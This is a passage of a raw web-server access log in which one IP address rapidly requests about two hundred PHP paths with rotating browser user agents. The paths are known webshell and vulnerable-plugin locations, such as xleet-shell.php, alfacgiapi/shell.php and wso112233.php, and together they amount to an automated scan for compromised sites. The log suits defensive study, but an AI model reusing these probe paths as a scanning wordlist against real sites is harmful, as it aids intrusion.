Firefox/72.0" 146.70.160.252 - - [15/Sep/2024:22:16:13 +0700] "GET /js/as.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 146.70.160.252 - - [15/Sep/2024:22:16:13 +0700] "GET /pki-validation/wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:13 +0700] "GET /Requests/Text/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:14 +0700] "GET /uploads/error_log.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:14 +0700] "GET /pomo/conf-php.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:16:14 +0700] "GET /SimplePie/Cache/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:14 +0700] "GET /wp-admin/config.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 146.70.160.252 - - [15/Sep/2024:22:16:14 +0700] "GET /js/Files/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 146.70.160.252 - - [15/Sep/2024:22:16:15 +0700] "GET /upload_form.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:15 +0700] "GET /task.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:15 +0700] "GET /mu-plugins/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:15 +0700] "GET /bsbdoaro.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 146.70.160.252 - - [15/Sep/2024:22:16:15 +0700] "GET /plugins/ova-back.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 146.70.160.252 - - [15/Sep/2024:22:16:16 +0700] "GET /wp-includes/admin-bar.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:16 +0700] "GET /uploads/wp-dbs.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:16 +0700] "GET /pki-validation/fierza.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:16 +0700] "GET /wp-includes/classwithtostring.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:16 +0700] "GET /themes/sketch/404.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:17 +0700] "GET /plugins/revslider/includes/external/page/autoload_classmap.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:17 +0700] "GET /js/tinymce/wp-includes/js/tinymce/wp-tinymce.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 146.70.160.252 - - [15/Sep/2024:22:16:17 +0700] "GET /phpunit/phpunit/src/Util/PHP/wpx.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:17 +0700] "GET /uploads/wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:18 +0700] "GET /plugins/seoo/masfix.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.160.252 - - [15/Sep/2024:22:16:18 +0700] "GET /css/common_configuration.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:18 +0700] "GET /plugins/shell/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:18 +0700] "GET /css/dist/chosen.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.160.252 - - [15/Sep/2024:22:16:18 +0700] "GET /uploads/2023/12/themes.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:19 +0700] "GET /rest-api/class-wp-rest-core.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:19 +0700] "GET /odeobaim.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:19 +0700] "GET /widgets/moon.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:19 +0700] "GET /bx.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 146.70.160.252 - - [15/Sep/2024:22:16:20 +0700] "GET /php-compat/wp-config-sample.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:20 +0700] "GET /IXR/themes.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:20 +0700] "GET /maint/chosen.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:20 +0700] "GET /themes/twentytwentythree/patterns/web.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 146.70.160.252 - - [15/Sep/2024:22:16:20 +0700] "GET /themes/rehub-theme/moez.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:21 +0700] "GET /plugins/pwnd/2.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:21 +0700] "GET /wp-system.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 146.70.160.252 - - [15/Sep/2024:22:16:21 +0700] "GET /css/colors/blue/moon.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:21 +0700] "GET /pki-validation/edit.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:22 +0700] "GET /certificates/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:22 +0700] "GET /defaults.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:22 +0700] "GET /themes/ova-re.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:22 +0700] "GET /wp-widgets.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:22 +0700] "GET /uploads/2018/update.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:23 +0700] "GET /ID3/wp-css.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:23 +0700] "GET /Text/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.160.252 - - [15/Sep/2024:22:16:23 +0700] "GET /maint/wp-admin/maint/repair.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:23 +0700] "GET /controller/extension/wpm.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:23 +0700] "GET /plugins/ioxi/ioxi/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:24 +0700] "GET /ab.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 146.70.160.252 - - [15/Sep/2024:22:16:24 +0700] "GET /zoom_w.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 146.70.160.252 - - [15/Sep/2024:22:16:24 +0700] "GET /k.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:24 +0700] "GET /js/tinymce/skins/lightgray/fonts/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:16:24 +0700] "GET /beez5/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:25 +0700] "GET /wp-includes/images.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:25 +0700] "GET /pomo/9876sd.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:25 +0700] "GET /plugins/ubh/up.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:25 +0700] "GET /about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:26 +0700] "GET /loginform.inc.php3 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:26 +0700] "GET /customize/class-wp-signdown.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:26 +0700] "GET /bin/test.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:26 +0700] "GET /js/widgets/moon.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 146.70.160.252 - - [15/Sep/2024:22:16:26 +0700] "GET /beez5/moon.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:27 +0700] "GET /certificates/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:27 +0700] "GET /Requests/Utility/content.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.160.252 - - [15/Sep/2024:22:16:27 +0700] "GET /pki-validation/cloud1.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:16:27 +0700] "GET /mari.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 146.70.160.252 - - [15/Sep/2024:22:16:28 +0700] "GET /wp-content/plugins/rex/l/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:28 +0700] "GET /plugins/erin/yani/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:28 +0700] "GET /demo.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 146.70.160.252 - - [15/Sep/2024:22:16:28 +0700] "GET /js/mediaelement/radio.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:28 +0700] "GET /pki-validation/ws.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:29 +0700] "GET /widgets/include.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:16:29 +0700] "GET /random_compat/wp-conflg.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:29 +0700] "GET /images/install.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:16:29 +0700] "GET /languages/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 146.70.160.252 - - [15/Sep/2024:22:16:29 +0700] "GET /plugins/compat3x/css/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:30 +0700] "GET /pkivalidation/wso112233.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:30 +0700] "GET /maint/maint/ajax-actions.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 146.70.160.252 - - [15/Sep/2024:22:16:30 +0700] "GET /Text/Diff/Engine/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:30 +0700] "GET /themes/newstoday/lang.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:31 +0700] "GET /themes/gaukingo/db.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" 146.70.160.252 - - [15/Sep/2024:22:16:31 +0700] "GET /plugins/file.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:16:31 +0700] "GET /0k.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:31 +0700] "GET /css/colors/midnight/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:32 +0700] "GET /acme-challenge/ms-default-constants_new.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:32 +0700] "GET /plugins/elementor/elementor-soap.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:32 +0700] "GET /widgets/class-wp-widget-tag.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.160.252 - - [15/Sep/2024:22:16:32 +0700] "GET /blocks/tinyfilemanager.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 146.70.160.252 - - [15/Sep/2024:22:16:32 +0700] "GET /ID3/radio.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:16:33 +0700] "GET /gix.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 146.70.160.252 - - [15/Sep/2024:22:16:33 +0700] "GET /lock.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:33 +0700] "GET /json.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 146.70.160.252 - - [15/Sep/2024:22:16:33 +0700] "GET /index1.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:34 +0700] "GET /fonts/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:34 +0700] "GET /js/a.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:34 +0700] "GET /pki-validation/delpaths.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:34 +0700] "GET /includes/xleet-shell.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:35 +0700] "GET /zwi-cofg.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:35 +0700] "GET /phpunit/phpunit/src/Util/PHP/as.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 146.70.160.252 - - [15/Sep/2024:22:16:35 +0700] "GET /map.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.160.252 - - [15/Sep/2024:22:16:35 +0700] "GET /plugins/elementor/wp-content/plugins/elementor/elementor.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:16:35 +0700] "GET /uploads/tp.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:36 +0700] "GET /uploads/dec.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:36 +0700] "GET /pki-validation/bless1.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 146.70.160.252 - - [15/Sep/2024:22:16:36 +0700] "GET /network/cl.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:16:36 +0700] "GET /wp-class.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:37 +0700] "GET /alfacgiapi/shell.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 146.70.160.252 - - [15/Sep/2024:22:16:37 +0700] "GET /random_compat/bala.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:37 +0700] "GET /wp-content/uploads/wp_live_chat/abruzi.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:37 +0700] "GET /addpost.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:37 +0700] "GET /plugins/fix/moon.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 146.70.160.252 - - [15/Sep/2024:22:16:38 +0700] "GET /service.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:38 